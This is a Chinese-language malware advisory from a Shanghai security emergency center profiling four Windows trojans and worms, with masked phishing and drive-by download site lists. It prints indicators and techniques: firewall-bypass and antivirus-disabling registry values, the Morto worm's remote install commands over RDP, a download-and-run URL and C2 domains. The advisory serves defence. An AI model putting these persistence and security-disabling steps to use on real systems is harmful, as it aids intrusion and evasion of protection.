Backdoor.Proxybox
警惕程度 ★★★
影响平台:Win 9X/ME/NT/2000/XP/Server 2003/Vista
Backdoor.Proxybox是一个木马,它在受感染电脑上打开一个后门,有可能窃取计算机内的信息。
木马执行时,它可能会创建以下文件:
%SystemDrive%\Documents and Settings\All Users\Application Data\Adobe\sp.dll
%SystemDrive%\Documents and Settings\All Users\Application Data\Adobe\fs.cfg
%SystemDrive%\Documents and Settings\All Users\Application Data\Adobe\rxsupply.sys
接下来,木马会创建以下注册表子项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\Parameters\"ServiceDll" = "%SystemDrive%\Documents and Settings\All Users\Application Data\Adobe\sp.dll""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\Enum\"0" = "Root\LEGACY_SHTST\0000"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\Parameters\"ServiceDll" = "%SystemDrive%\Documents and Settings\All Users\Application Data\Microsoft\sp.DLL"
HKEY_CLASSES_ROOT\CLSID\{96AFBE69-C3B0-4b00-8578-D933D2896EE2}\InProcServer32\"(Default)" = "%SystemDrive%\Documents and Settings\All Users\Application Data\Microsoft\sp.DLL"
HKEY_CLASSES_ROOT\sp\CLSID\"(Default)" = "{96AFBE69-C3B0-4b00-8578-D933D2896EE2}"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\sp\"(Default)" = "{96AFBE69-C3B0-4b00-8578-D933D2896EE2}"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\"{96AFBE69-C3B0-4b00-8578-D933D2896EE2}" = "sp"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\"ImagePath" = "%System%\svchost.exe -k netsvc"
HKEY_CLASSES_ROOT\CLSID\{96AFBE69-C3B0-4b00-8578-D933D2896EE2}\InProcServer32\"(Default)" = "%SystemDrive%\Documents and Settings\All Users\Application Data\Adobe\sp.DLL"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\"ImagePath" = "%System%\svchost.exe -k netsvc"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\"netsvc" = "SPService, J"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\"netsvc" = "SPService, m"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FsFilter\"ImagePath" = "%SystemDrive%\Documents and Settings\All Users\Application Data\adobe\rxsupply.sys"
它还创建以下注册表项,以绕过Windows防火墙“
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"%System%\svchost.exe" = "%System%\svchost.exe:*:Enabled:svchost.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"%System%\svchost.exe" = "%System%\svchost.exe:*:Enabled:svchost.exe"
它还会修改以下注册表项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\Enum\"NextInstance" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\Enum\"Count" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\"ErrorControl" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\"Start" = "2"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\"Type" = "110"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPService\"ObjectName" = "LocalSystem"
接下来,黑客使用连接命令和控制服务器在受感染的电脑上打开一个后门。之后,该受感染电脑充当代理服务器。
该木马还可以安装一个rootkit驱动程序,隐藏威胁所使用的文件。
该木马程序还可以尝试连接到以下远程地址:
chtlybq.com.tw
boysboysboys.com.tw
rs-socks.com
startrackz.com.tw
starwarz.com.tw
freesearch.com.tw
cargroup.com.tw
预防和清除:
不要点击不明网站;打开不明邮件附件;定时经常更新杀毒软件病毒数据库,最好打开杀毒软件的病毒数据库自动更新功能。关闭电脑共享功能,关闭允许远程连接电脑的功能。
Trojan.Mebromi.B
警惕程度 ★★
影响平台:Win 9X/ME/NT/2000/XP/Server 2003/Vista
Trojan.Mebromi.B是一个木马,它试图感染BIOS和主引导记录(MBR)。
木马执行时,它可能会复制到以下位置:
%SystemDrive%\RECYCLER\[RANDOM NUMBER].tmp
接下来,它会删除以下注册表子项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Win
然后该木马,访问受感染的计算机的BIOS信息。如果BIOS是AWARD BIOS并且BIOS还没有被感染,木马会尝试创建下列文件用以感染BIOS:
C:\bios.bin
接下来,木马将尝试连接到下列远程地址:
[http://]222.169.224.229/zjb/HHN0912/01/svchs[REMOVED]
然后,木马从上述远程地址下载下列文件并运行:
C:\a.jpg
预防和清除:
不要点击不明网站;打开不明邮件附件;定时经常更新杀毒软件病毒数据库,最好打开杀毒软件的病毒数据库自动更新功能。
Java.Cogyeka
警惕程度 ★★★
影响平台:Win 9X/ME/NT/2000/XP/2003/Vista
Java.Cogyeka是一个蠕虫病毒,通过可移动和映射驱动器传播。它也可以从远程地址下载一个文件到受感染的计算机。
在蠕虫执行时,它会创建以下文件:
%Temp%\hsperfdata_[USER NAME]\[RANDOM DIGITS]
%Temp%\hsperfdata_[USER NAME]\[SYSTEM EXECUTABLE FILE NAME].exe
%Temp%\hsperfdata_[USER NAME]\[RANDOM LETTERS].dll
%Temp%\jar_cache[RANDOM DIGITS].tmp
然后,该蠕虫将创建下列注册表项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{175975F5-C68F-0875-C827-9225E76EAC65}\"StubPath" = "cmd /q /c start "" /I /B javaw -classpath %Temp%\jar_cache[NUMBERS].tmp"
该蠕虫会在可移动驱动器和映射驱动器上创建以下文件,用以传播:
%DriveLetter%\RECYCLER\[SID]\[RANDOM LETTERS].[THREE RANDOM LETTERS]
%DriveLetter%\RECYCLER\[SID]\desktop.ini
%DriveLetter%\autorun.inf
该木马从以下地址下载一个模块:
[RANDOM LETTERS].[DOMAIN NAME]:[RANDOM PORT NUMBER]
注:[DOMAIN NAME]为以下之一:
zapto.org
servequake.com
servegame.com
3utilities.com
serveirc.com
myftp.org
myvnc.com
servecounterstrike.com
servebeer.com
redirectme.net
no-ip.org
serveftp.com
servemp3.com
no-ip.info
hopto.org
serveblog.net
no-ip.biz
servehalflife.com
servepics.com
myftp.biz
servehttp.com
sytes.net
然后,它在受感染电脑上随机打开一个UDP端口,用来下载使用模块。
预防和清除:
不要点击不明网站;打开不明邮件附件;定时经常更新杀毒软件病毒数据库,最好打开杀毒软件的病毒数据库自动更新功能。关闭可移动驱动器的自动播放功能。
W32.Morto.B
警惕程度 ★★★
影响平台:Win 9X/ME/NT/2000/XP/2003/Vista
W32.Morto.B是一个蠕虫病毒,通过可移动驱动器,并通过使用远程桌面协议(RDP)连接传播。它还感染计算机的可执行文件。
蠕虫执行时,它会注入到以下的系统服务中:
svchost.exe
接下来,该蠕虫复制文件%SYSTEM%\ WScript.exe到下列位置:
%System%\wmicuclt.exe
接着,该蠕虫感染下列文件,在最后一节中注入含有可感染的代码:
%System%\wmicuclt.exe
该蠕虫还会创建以下注册表,注册自身为系统服务:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\Security\"Security" = "[WORM BODY IN HEXADECIMAL CHARACTERS]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"WOW64" = "2"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"Start" = "2"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"ErrorControl" = "0"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"Type" = "20"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"ObjectName" = "Local System"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wmicucltsvc\"(Default)" = "Service"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"Description" = "Stores security information for local user accounts."
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"DisplayName" = "Remote Access Connection Service"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wmicucltsvc\"ImagePath" = "%System%\wmicuclt.exe"
该蠕虫还创建以下注册表项来存储数据,做为其自身的副本:
HKEY_LOCAL_MACHINE\SYSTEM\Select\"v" = "[WORM BODY]"
HKEY_LOCAL_MACHINE\SYSTEM\Select\"p" = "[DATA]"
HKEY_LOCAL_MACHINE\SYSTEM\Select\"pu" = "[DATA]"
蠕虫还修改以下注册表,用来禁用某些系统设置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows\"NoPopUpsOnBoot" = "1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\"DontshowUI" = "1"
该蠕虫还会修改以下注册表项,用来禁用安全相关的应用程序:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\360rp\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\zhudongfangyu\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ekrn\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MsMpSvc\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\V3 Service\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\AntiVirService\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\a2AntiMalware\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\FSORSPClient\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\FSMA\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\F-Secure Gatekeeper Handler Starter\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\kxescore\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\kxesapp\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\AVGwd\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\AVGIDSAgent\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NIS\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\avast! Antivirus\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\vsserv\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mcshield\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mcods\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\amsp\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RsRavMon\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SavService\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\PavFnSvr\"Start" = "4"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\pavsrv\"Start" = "4"
该蠕虫还会通过使用常用的用户名、密码组合,试图打开远程桌面协议(RDP)连接到本地网络的计算机上。
一旦连接,它会打开受感染电脑上创建的默认(RDP)文件,共享访问网络上的计算机:
\\tsclient
它利用下列命令,在远程计算机上安装自身:
rundll32 \\tsclient\a\a.dll a
regedit /s \\tsclient\a\r.reg
该蠕虫还可能复制自身到可移动驱动器传播。
接下来,该蠕虫可能连接到下列远程地址,下载恶意文件:
d.ppns.info
e.ppift.net
e.ppift.com
e.ppift.in
预防和清除:
不要点击不明网站;打开不明邮件附件;定时经常更新杀毒软件病毒数据库,最好打开杀毒软件的病毒数据库自动更新功能。安装最新的Windows安全补丁。
钓鱼网站提示:
**.**8866866666.com/
www.**7888888888.com/
www.**7888888888.com/analytics.php
www.**7888888888.com/app/member/upupflash.php
www.***wggdongwgdongwgongwgngwggwgwgg.com/adfile/banner.htm
挂马网站提示:
http://yj2002.**222.org
http://wawa188.**222.org
http://weiers1957.**222.org
http://yefd32255.**888.org
http://jhisihs.**666.org
请勿打开类似上述网站,保持计算机的网络防火墙打开。
以上信息由上海市网络与信息安全应急管理事务中心提供